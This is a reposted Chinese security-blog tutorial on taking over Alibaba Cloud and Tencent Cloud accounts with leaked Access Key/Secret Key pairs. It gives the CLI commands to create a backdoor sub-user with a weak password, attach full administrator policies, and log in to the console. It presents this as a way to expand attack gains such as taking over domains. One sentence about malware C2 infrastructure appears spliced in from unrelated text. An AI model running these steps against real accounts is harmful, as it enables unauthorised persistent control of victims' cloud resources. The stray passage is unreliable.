1►
前言
在云计算中,AK(Access Key)和SK(Secret Key)通常用于进行 API 调用,以便访问和管理云服务资源。这些密钥对于安全性至关重要,因为它们允许对云资源执行各种操作。如果泄露或不当使用,可能会导致严重的安全风险和数据泄露。
而在实战中,大部分文章基本是什么工具一把嗦嗦哈,看oss,rds,ecs,其实如果ak,sk权限过大,是可以创建子用户来登录云管的,说不定登进去就能接管域名,im服务等扩大攻防成果。
下面介绍腾讯云,阿里云的接管方式,其他云大差不差,看官方文档就能搞。
2►
阿里云
显示,长期和全面的准备阶段与第一个恶意软件样本的开发以及命令和控制(C2)基础设施的部署有关。
阿里云有一个ram账号,可以看看他的官方介绍
RAM用户由阿里云账号(主账号)或具有管理员权限的其他RAM用户,同时ram账号可以用ak,sk进行调用api创建
根据阿里云官方的命令行工具https://github.com/aliyun/aliyun-cli/blob/master/README-CN.md
配置 ak sk
./aliyun configure --profile akprofile创建ram账号
查看别名./aliyun ram GetAccountAlias常见账号./aliyun aliyun ram CreateUser --UserName SxfnbQaxsb2333设置密码./aliyun ram CreateLoginProfile --UserName SxfnbQaxsb2333 --Password 123456设置权限./aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName SxfnbQax**2333
创建好账号后,查看该云的别名
./aliyun ram GetAccountAlias 获取id放在域名后面登录账号为
创建的用户@+别名+.onaliyun.com
然后就可以用这个账号正常登录阿里云,和你自己账号登录阿里云一样
3►
技术细节
腾讯云也一样,只不过叫法不同,腾讯云叫子用户,与阿里云不同的是,腾讯云登录子用户需要主账号id才可以
我们下载其官方命令行工具
https://github.com/TencentCloud/tencentcloud-cli查看命令行命令
获取主用户idtccli cam GetUserAppId --cli-unfold-argument
创建子用户tccli cam AddUser –cli-unfold-argument --Name Sxfnb2333 --Remark sxf --ConsoleLogin 1 --Password '123456' --NeedResetPassword 0查询策略tccli cam ListPolicies --cli-unfold-argument给最高权限tccli cam AttachUserPolicy --cli-unfold-argument --PolicyId 1 --AttachUin 100035117703列出子用户tccli cam ListUsers --cli-unfold-argument
创建好后然后去登录
文章作者:先知社区(penso****)
文章来源:https://xz.aliyun.com/t/13538
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...